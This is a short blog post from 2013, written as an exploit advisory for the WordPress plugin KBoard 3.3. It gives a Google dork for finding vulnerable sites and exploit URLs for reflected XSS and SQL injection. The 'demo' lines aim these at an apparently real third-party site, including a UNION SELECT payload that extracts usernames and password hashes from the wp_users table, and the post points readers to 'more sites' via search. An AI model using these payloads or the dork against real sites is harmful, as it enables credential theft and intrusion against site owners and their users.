Monday, 11 November 2013
KBoard 3.3 SQLi/XSS
Exploit Title: WordPress plugins KBoard SQLi/XSS Vulnerabilities
# Vendor Homepage: http://www.cosmosfarm.com/products/kboard
# Download link: http://www.cosmosfarm.com/wpstore/kboard/download-kboard?version=3.3
# Category: webapps/php
# Version: 3.3
# Google dork: inurl:wp-content/plugins/kboard/board.php
---------------------------------------------------
[#] [XSS]
Vulnerable Parameters: pageid, search, keyword
-exploit-
http://[host]/wp-content/plugins/kboard/board.php?board_id=1&pageid=1&mod=list&search=&keyword=[xss]
-demo-
http://www.chahongardor.com/wp-content/plugins/kboard/board.php?board_id=1&pageid=1&mod=list&search&keyword=%22%27%3E%3CScRiPT%3Ealert%28%2FXSS%2F%29%3C%2FScRiPT%3E
[#] [SQL Injection]
-exploit-
http://[host]/wp-content/plugins/kboard/board.php?board_id=2&mod=document&uid=[SQL_Injection]
-demo-
http://www.chahongardor.com/wp-content/plugins/kboard/board.php?board_id=2&mod=document&uid=999+union+select+group_concat%28user_login%2C0x3a%2Cuser_pass%29%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18+from+wp_users
note: the result in page source
more sites in G00GLE
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment